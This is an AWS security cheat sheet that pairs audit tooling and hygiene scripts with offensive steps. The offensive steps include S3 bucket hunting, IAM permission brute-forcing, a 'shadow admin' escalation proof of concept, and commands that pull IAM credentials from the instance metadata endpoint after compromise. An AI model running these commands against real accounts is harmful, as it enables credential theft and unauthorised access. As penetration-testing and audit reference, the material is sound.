Automated Scanning Tools

These are tools that can be run by attackers or defenders to get a sense for all of the assets in an environment.

Create audit user to use for running tools

export AUDIT_IAM_USER="usr-security-audit"

aws iam create-user --user-name "${AUDIT_IAM_USER}"
aws iam attach-user-policy --user-name "${AUDIT_IAM_USER}" --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess
aws iam attach-user-policy --user-name "${AUDIT_IAM_USER}" --policy-arn arn:aws:iam::aws:policy/SecurityAudit

aws iam create-access-key --user-name "${AUDIT_IAM_USER}"

Be sure to create a profile in your ~/.aws/config and ~/.aws/credentials for this user to make copy and pasting the steps for tools below as easy as possible!

Resources:

CloudMapper

This will give you a visual perspective on the target environment, and the relationships that exist between the various assets.

Install OS dependencies:

  • macOS:

    brew install autoconf automake libtool jq awscli pyenv pipenv
    
  • Debian-based system:

    sudo apt-get install -y autoconf \
      automake libtool python3.7-dev python3-tk jq awscli build-essential
    
  • CentOS, RHEL, etc.:

    sudo yum install -y autoconf automake libtool python3-devel.x86_64 \
      python3-tkinter python-pip jq awscli
    

Installation and configuration:

Clone the repo:

git clone git@github.com:duo-labs/cloudmapper.git

Set up python and install dependencies:

cd cloudmapper
pipenv --python 3.8.3 && pipenv shell
pip install --upgrade pip
# Remove the explicit versions because this project
# uses nightmare dependencies and python wants to ruin your life
sed -i '' 's/==.*//' requirements.txt
pipenv install --skip-lock
# Use demo config as a base for your config
cp config.json.demo config.json

Set your config to point to the target account IDs:

{
  "accounts": [
    { "id": "123456789012", "name": "dev", "default": true },
    { "id": "123456789013", "name": "prod", "default": false }
  ],
  "cidrs": {}
}

Note: Do not forget to include the empty cidrs key-value pair, or the tool won’t work and will not tell you why!s

Collect data from the environment

If you don’t use profiles, you’ll need to configure your credentials. Here’s a page to help you with that: /aws-cheatsheet/#useenvvars.

This particular example will get you information from the dev environment you’ve configured:

python cloudmapper.py collect --profile ${AWS_PROFILE} --account dev

Generate data for the map

python cloudmapper.py prepare --account dev

Generate a report

python cloudmapper.py report --account dev

Run the webserver to interface with the report

python cloudmapper.py webserver

Access the report at http://127.0.0.1:8000/account-data/report.html

You can also view the graphical representation of the relationships between resources at http://127.0.0.1:8000

Resources:

ScoutSuite

https://github.com/nccgroup/ScoutSuite will generate an HTML report outlining various issues that exist in the configuration for a given account.

Installation and configuration:

git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3.8.3 && pipenv shell
pipenv install --skip-lock

Run it:

python scout.py aws --profile "${AWS_PROFILE}"

Resource: https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/

PMapper

Provide an interface to understand IAM relationships.

Install OS dependencies:

MacOS:

brew install graphviz

Installation and configuration:

git clone git@github.com:nccgroup/PMapper.git
cd PMapper
pipenv --python 3.8.3 && pipenv shell
pipenv install --skip-lock

Run it:

Create a graph of accesses:

python pmapper.py --profile ${AWS_PROFILE} graph create

Analyze the results:

python pmapper.py analysis

Query the results:

python pmapper.py --profile ${AWS_PROFILE} query "who can do s3:GetObject with *"

Visualize the results

# This account ID should correspond to the environment that
# you've been interfacing with via ${AWS_PROFILE}
AWS_ACCOUNT_ID=123456789012
python pmapper.py --account ${AWS_ACCOUNT_ID} visualize

Query accesses: Examples of what you can do:

"can <Principal> do <Action> [with <Resource>]"
"who can do <Action> [with <Resource>]"
"preset <preset_query_name> <preset_query_args>"

Example - determine who can use the s3:GetObject permission:

python pmapper.py \
  --profile ${AWS_PROFILE} query "who can do s3:GetObject with *"

Resources:

Prowler

Install OS dependencies:

  • MacOS:

    brew install jq
    
  • Linux:

    sudo apt-get install -y jq
    

Installation and configuration:

git clone git@github.com:toniblyx/prowler.git
cd prowler
pipenv install --skip-lock
# Grab additional custom policy for extras and add to our audit user
wget https://raw.githubusercontent.com/toniblyx/prowler/master/iam/prowler-additions-policy.json
aws iam put-user-policy --user-name ${AUDIT_IAM_USER} --policy-name prowler-additions-policy --policy-document file://prowler-additions-policy.json

Run it:

# Output html report format
./prowler -r us-west-2 -M html -p ${AWS_PROFILE}

Resources:

SkyArk

Install OS dependencies:

  • MacOS:

    brew update && brew install azure-cli
    
  • Linux:

    curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
    

Installation and configuration:

git clone git@github.com:cyberark/SkyArk.git
cd SkyArk

Run it:

pwsh-preview
Import-Module .\SkyArk.ps1 -force
Start-AWStealth

Input your AWS creds when prompted.

Resource: https://github.com/cyberark/SkyArk


Secrets Hunting

If you’re hunting for secrets in git repos, you can try some of these commands:

Search for aws keys in bash scripts

find / -name '*.sh' -exec grep -HE "([^A-Z0-9]|^)AKIA[A-Z0-9]{12,}" {} \;

Resource: https://twitter.com/omespino/status/1242977678329819141?s=20

Search for access keys with grep

Access key:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' * 2>/dev/null

Secret access key:

grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' * 2>/dev/null

Resource: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10


S3

Hunting

You can reach S3 buckets via a web interface regardless of whether or not access is permitted. The URL formats are:

https://<bucketname>.s3.amazonaws.com
https://s3.amazonaws.com/<bucketname>

A couple of things worth keeping in mind for creating tooling around hunting for buckets:

  • Names must be >= 3 && <= 63 characters long
  • Names can contain lowercase letters, numbers and hyphens
  • Names consist of labels, which can be separated with periods. Each label must start and end with a lowercase letter or number
  • Bucket names can’t be formatted as an IP address

Response codes

404 - bucket doesn’t exist 403 - bucket exists but you don’t have access 200 - bucket exists and is accessible

If a bucket returns a 403, you can still do some things with the S3 API (this does cost money per 1000 requests, so be sparing when hunting for buckets on a large scale).

AWS CLI

It’s also worth trying things out with the CLI. It’s also important to remember to try reading and writing (sometimes you can do one and not the other).

List files in bucket:

aws s3 ls s3://bucketname

Copy a file to a bucket:

aws s3 cp canary.txt s3://bucketname

Google Dorks

site:s3.amazonaws.com example
site:s3.amazonaws.com example.com
site:s3.amazonaws.com example-com
site:s3.amazonaws.com com.example
site:s3.amazonaws.com com-example

List the size and name of s3 buckets your credentials can access

Be sure to change the region.

#!/bin/bash
aws_profile=('default' 'otherprofile');

#loop AWS profiles
for i in "${aws_profile[@]}"; do
  echo "${i}"
  buckets=($(aws --profile "${i}" --region us-east-2 s3 ls s3:// --recursive | awk '{print $3}'))

  #loop S3 buckets
  for j in "${buckets[@]}"; do
  echo "${j}"
  aws --profile "${i}" --region us-east-2 s3 ls s3://"${j}" --recursive --human-readable --summarize | awk END'{print}'
  done

done

Run S3Scanner

git clone git@github.com:sa7mon/S3Scanner.git
cd S3Scanner
pipenv shell
pip install -r requirements.txt
python s3scanner.py buckets_to_test.txt

buckets.txt should generally look something like this:

a-bucket
b-bucket

Just to make sure it’s totally clear what exactly you should put into buckets.txt; if you were to run a curl command to test if the first bucket was open, you would run something like this:

# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" https://s3.amazonaws.com/a-bucket
# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" -L https://a-bucket.s3.amazonaws.com

Do not name your input file to buckets.txt or this thing will do an infinite loop!

Resources:

Run S3 Objects Check

Provides white and blackbox testing of S3 object permissions.

python s3-objects-check.py -p internal-profile -e external-profile

Resources:

Create vulnerable s3 bucket

Warning: This is seriously super bad to do and you should destroy it with fire/never ever do this!!!!

# Create bucket
BUCKET_NAME=$(head /dev/urandom | tr -dc a-z0-9 | head -c 25 ; echo '')
aws s3 mb s3://${BUCKET_NAME}

# Create bucket policy that makes the bucket publicly readable/writable
cat > seriously_bad_bucket_policy.json <<- EOM
{
   "Statement": [
      {
         "Effect": "Allow",
         "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::${BUCKET_NAME}/*"
      },
      {
         "Effect": "Allow",
         "Principal": "*",
         "Action": [
            "s3:PutObject"
         ],
         "Resource": "arn:aws:s3:::${BUCKET_NAME}/*"
      }
   ]
}
EOM

# Add bucket policy that makes all items in the bucket public
aws s3api put-bucket-policy --bucket ${BUCKET_NAME} --policy file://seriously_bad_bucket_policy.json

# Disable account public access block for all s3 buckets
aws s3control put-public-access-block --public-access-block-configuration BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false --account-id 11231231231 | jq

# Unset creds
unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID AWS_PROFILE

# Upload something.pdf to bucket
aws s3 cp something.pdf s3://${BUCKET_NAME} --no-sign-request

# Download picture
curl https://${BUCKET_NAME}.s3.us-west-2.amazonaws.com/something.pdf -o 'stolen_something.pdf'

Resource: https://searchcloudsecurity.techtarget.com/feature/Hands-on-guide-to-S3-bucket-penetration-testing

Find empty buckets

for bucket in $(aws s3api list-buckets --query "Buckets[].Name" \
  --output table | tail -n +4 | awk '{print $2}'); do
    if [ `aws s3 ls $bucket | wc -m | awk '{print $1}'` = 0 ]; then aws s3api get-bucket-website --bucket $bucket > /dev/null 2>&1 ; ret=$? ; if [ $ret -ne 0 ] ; then echo "$bucket" ; fi ; fi ; done

Resource: https://gist.github.com/ericpardee/aa41fa0b05603d075792c9ce8d4529a0

Upload file to public S3 bucket w/ no creds

BUCKET_NAME=blaasdfasdf
unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID AWS_PROFILE
aws s3 cp something.pdf s3://${BUCKET_NAME}/ --region us-west-2 --no-sign-request

Resource: https://github.com/aws/aws-cli/issues/904


Post Exploitation

This is a good place to start if you’ve got credentials or you’ve compromised a system that’s hosted on AWS.

Configure credentials for AWS cli

If you have any existing AWS environment variables set, unset them:

unset {AWS_DEFAULT_REGION,AWS_SECRET_ACCESS_KEY,AWS_ACCESS_KEY_ID}

Add the compromised keys to ~/.aws/credentials. It should look something like this:

[target_name]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token=AQoDYXdzEJr...<remainder of security token>

Make sure to set the proper region as well in ~/.aws/config, which you can get using this command on the compromised instance:

curl http://169.254.169.254/latest/dynamic/instance-identity/document

An alternative with wget:

wget -O - -q http://169.254.169.254/latest/dynamic/instance-identity/document

It should look something like this:

[target_name]
region = target_region_here
output = json

Set the profile:

export AWS_PROFILE=target_name

Get UserID

aws sts get-caller-identity --output json | jq -r '.UserId'

BruteForce IAM Permissions

git clone git@github.com:andresriancho/enumerate-iam.git
cd enumerate-iam/
pipenv --python 3.8.3 && pipenv shell
pipenv install --skip-lock
cd enumerate_iam
git clone git@github.com:aws/aws-sdk-js.git
python generate_bruteforce_tests.py
rm -rf aws-sdk-js
python enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN

Resource: https://hackingthe.cloud/aws/enumeration/brute_force_iam_permissions/

Test IAM for priv esc potential

Use https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/aws_escalate/aws_escalate.py

Import an SSH key

aws ec2 import-key-pair --key-name 'THE_BEST_KEY_EVER' --public-key-material file:///home/ubuntu/.ssh/not_evil_i_promise.pub

Resource: https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/


Pacu

Set the keys

This will use the keys in ~/.aws/credentials from the default region:

import_keys default

Set the region

This will set the region to us-east-2:

set_regions us-east-2

Verify credentials

whoami

List modules

ls

Run module

This will run a module to enumerate permissions the current account has:

run iam__enum_permissions

Find VPCs without flow logs

for region in `aws ec2 describe-regions --output text | cut -f4`; do; echo "in $region"; aws ec2 --region $region describe-flow-logs | jq '.FlowLogs[] | select (.DeliverLogsStatus == "FAILED")'; done

Create AMI without stopping instance

aws ec2 create-image --instance-id $INSTANCE_ID --name "TotallyNormalNothingToSeeHere" --description "The best AMI" --no-reboot

Resource: https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/


Shadow Admin POC

For this to work you’ll need credentials that will allow you to list instance profiles, create a new key pair, and run instances.

  1. Get a list of instance profiles:
aws iam list-instance-profiles
  1. Locate a juicy role in the output
  2. Create a new key pair:
aws ec2 create-key-pair --key-name EvilKey
  1. Create new instance
aws ec2 run-instances --image-id ami-1234bv45 --instance-type t1.micro --security-groups default --iam-instance-profile Name=JuicyRole --key-name EvilKey
  1. Access the new instance and grab the iam security credentials:
curl http:/169.254.169.254/latest/meta-data/iam/security-credentials/JuicyRole
  1. Enjoy :)

Resource: https://www.youtube.com/watch?v=mK62I1BNmXs

Find Shadow Admin Accounts

aws iam list-attached-user-policies --user-name {}
aws iam get-policy-version --policy-arn provide_policy_arn --version-id $(aws iam get-policy --policy-arn provide_policy_arn --query 'Policy.DefaultVersionId' --output text)
aws iam list-user-policies --user-name {}
aws iam get-user-policy --policy-name policy_name_from_above_command --user-name {} | python -m json.tool

Resource: https://pentestbook.six2dez.com/enumeration/cloud/aws


Find unencrypted EBS volumes

Uses output from /aws-cheatsheet/#getactiveregions

for region in ${ACTIVE_REGIONS[@]}; do
  volumes=$(aws ec2 describe-volumes --region ${region} --filter Name=encrypted,Values=false --query 'Volumes[*].[VolumeId]' --output text >/dev/null 2>&1)
  if [[ ! -z ${volumes} ]]; then
    echo "Unencrypted volumes found in ${region}:\n${volumes}"
  fi
done

Find unencrypted volumes connected to EC2 instances

volumes=$(aws ec2 describe-volumes --region eu-west-1 --filter "Name=encrypted,Values=false" "Name=status
,Values=available" --query 'Volumes[*].[VolumeId]' --output text)

if [[ ! -z ${volumes} ]]; then
  echo "Unencrypted volumes found that are connected to ec2 instances:\n${volumes}"
fi

Resources:

Find unencrypted EBS snapshots

AWS_ACCOUNT_ID=123456789012

for snapshot in $(aws ec2 describe-snapshots --region ${AWS_REGION} --owner-ids ${AWS_ACCOUNT_ID} --filters Name=status,Values=completed --output text --query 'Snapshots[*].SnapshotId'); do
    enc=$(aws ec2 describe-snapshots --region ${AWS_REGION} --snapshot-id ${snapshot} --query 'Snapshots[*].Encrypted' --output text)

    if [[ $enc="False" ]]; then
        echo "No encryption for ${snapshot}!!"
    else
        echo "${snapshot} is encrypted"
    fi
done

Find neglected access keys

#!/bin/bash

set -e

usernames=($(aws iam list-users --output text | cut -f 6))
upper_bound='90 days ago'

for user in ${usernames[@]}; do
  echo "Reviewing access keys for ${user}:"
  keys=($(aws iam list-access-keys --user-name ${user} --output text | cut -f 2))
  for key in ${keys[@]}; do
    last_used=$(aws iam get-access-key-last-used --access-key-id ${key} | jq .AccessKeyLastUsed.LastUsedDate | tr -d '"')
    last_used_sec=$(date -j -f "%Y-%m-%dT%H:%M:%S+00:00" "${last_used}" +%s)
    upper_bound_sec=$(date -j -v-90d +%s)

    if [[ ${last_used_sec} -lt ${upper_bound_sec} ]]; then
      echo "${key} has not been used in over 90 days!"
    fi
  done
done

Resources:


Grab Instance Profile creds, print in copy paste format

echo "export AWS_ACCESS_KEY_ID=$(curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks_node_test_private | jq .AccessKeyId | tr -d '"')"
echo "export AWS_SECRET_ACCESS_KEY=$(curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks_node_test_private | jq .SecretAccessKey | tr -d '"')"
echo "export AWS_SESSION_TOKEN=$(curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks_node_test_private | jq .Token | tr -d '"')"

GuardDuty

Get GuardDuty detector id

aws guardduty list-detectors \
  --region us-east-1 --query 'DetectorIds[0]' | tr -d '"'

Get GuardDuty finding ids

aws guardduty list-findings \
  --region us-east-1 --detector-id \
    $(aws guardduty list-detectors \
    --region us-east-1 --query 'DetectorIds[0]' | tr -d '"')

Resource: https://www.cloudconformity.com/knowledge-base/aws/GuardDuty/findings.html


IAM

Identify IAM users with specific access

users=$(aws iam list-users --query 'Users[*].UserName' --output text)
permission=guardduty:ListDetectors

for user in $users; do
    # List attached user policies and check for permission
    policies=$(aws iam list-user-policies --user-name $user --query 'PolicyNames' --output text)

    for policy in $policies; do
        policyDocument=$(aws iam get-user-policy --user-name $user --policy-name $policy --query 'PolicyDocument' --output json)
        if echo $policyDocument | jq -r '.Statement[] | select(.Effect == "Allow") | .Action' | grep -q $permission; then
            echo "User $user has $permission permission in policy $policy"
        fi
    done

    # List attached managed policies and check for permission
    attachedPolicies=$(aws iam list-attached-user-policies --user-name $user --query 'AttachedPolicies[*].PolicyArn' --output text)

    for policyArn in $attachedPolicies; do
        versions=$(aws iam list-policy-versions --policy-arn $policyArn --query 'Versions[*].VersionId' --output text)
        for version in $versions; do
            policyDocument=$(aws iam get-policy-version --policy-arn $policyArn --version-id $version --query 'PolicyVersion.Document' --output json)
            if echo $policyDocument | jq -r '.Statement[] | select(.Effect == "Allow") | .Action' | grep -q $permission; then
                echo "User $user has $permission permission in policy $policyArn version $version"
            fi
        done
    done
done